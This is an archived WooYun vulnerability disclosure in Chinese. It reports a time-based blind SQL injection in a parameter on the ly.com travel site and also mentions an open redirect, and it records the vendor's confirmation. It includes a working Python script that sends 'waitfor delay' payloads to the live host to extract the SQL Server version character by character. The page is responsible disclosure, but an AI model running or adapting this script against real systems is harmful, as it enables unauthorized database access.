当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095375

漏洞标题:同程网主站存在某处SQL盲注漏洞二(附验证脚本)

相关厂商:苏州同程旅游网络科技有限公司

漏洞作者: xxyyzz

提交时间:2015-02-03 11:53

修复时间:2015-03-20 11:54

公开时间:2015-03-20 11:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-03: 细节已通知厂商并且等待厂商处理中
2015-02-03: 厂商已经确认,细节仅向厂商公开
2015-02-13: 细节向核心白帽子及相关领域专家公开
2015-02-23: 细节向普通白帽子公开
2015-03-05: 细节向实习白帽子公开
2015-03-20: 细节向公众公开

简要描述:

同程网主站存在某处SQL盲注漏洞二

详细说明:

http://www.ly.com/dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.567149235517985&cityid=321的cityid参数存在SQL盲注。
另外一个URL跳转漏洞:
http://guard.ly.com/authcode.aspx?returnUrl=http%3a%2f%2fwww.baidu.com%2findex.php%3ftn%3dmonline_5_dg&ac=372259583

0.png


漏洞证明:

2.png


#-*-coding:utf-8-*-
import httplib
import time
import string
import sys
import random
import urllib
headers = {
    'Cookie': 'Hm_lvt_ca5679d0986b1f42f800098b798c7008=1422580774; Hm_lvt_f97c1b2277f4163d4974e7b5c8aa1e96=1421055383,1421056354,1421135352,1421135572; Hm_lvt_66fe51fe80bbcaf2044aa51205d7d88d=1422581413; SearchNew=%25E5%25A4%25A7%25E7%2590%2586%2526%25E5%258C%2597%25E4%25BA%25AC%25262015-02-02%2526%2526%2526; __tctma=144323752.1420797897384185.1420797897683.1422580182505.1422588301145.7; MAIF=||; MAIH=24489,24489,24489,77415,77415,135,24489,24489,24489; searchHistory=%E5%8C%97%E4%BA%AC,53,0,2015-01-13,2015-01-14; ABTest_115=657#1#42952259; MAIQZ=131; MAIHL=201448,201448,70855; Hm_lvt_15ef3105c6a9f68cd7c3b8617aec2e46=1422588841; Hm_lvt_0f71f0877229e4e6503de92a28cbf166=1422589516',
    'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
payloads += list(string.ascii_uppercase)
for i in range(0,10):
    payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive SQL Server Version:'
user = ''
for i in range(1,30,1):
    for payload in payloads:
        timeout_count = 0
        try:
            conn = httplib.HTTPConnection('www.ly.com', timeout=4) 
            random.seed()
            #area = str(random.random()) + "fasfa'; if (ascii(substring(@@version,%s,1))=%s) waitfor delay '0:0:5' -- "  % (i, ord(payload))
            #print i
            #print ord(payload)
            #headers['Cookie'] = "area=" + urllib.quote(area)
            url="/dujia/AjaxCallNew.aspx?type=GetQianzhengSearch&iid=0.567149235517985&cityid=321"+"if%28ascii%28substring%28%40%40version%2c"+str(i)+"%2c1%29%29="+str(ord(payload))+"%29waitfor%20delay'0%3a0%3a5'"
            #print url
            #time.sleep(0.1)
            start_time = time.time()
            conn.request(method='GET',
                         url=url,
                         headers = headers)
            conn.getresponse()
            conn.close()
            print '.',
            time.sleep(1) #robots
            
        except Exception as e:
            #print e
            timeout_count += 1
            
        if(timeout_count==1):    
            user += payload
            print '[In Progress]', user 
            break
print '\n[Done], SQL Server version is', user


修复方案:

过滤参数

版权声明:转载请注明来源 xxyyzz@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-02-03 12:27

厂商回复:

感谢对同程旅游的关注,下午会安排修复。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-02-06 09:45 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    楼主用burp检测盲注的技能能否传授一下

  2. 2015-02-07 18:58 | xxyyzz ( 实习白帽子 | Rank:57 漏洞数:6 | 123456)

    已收到200礼品卡,多谢。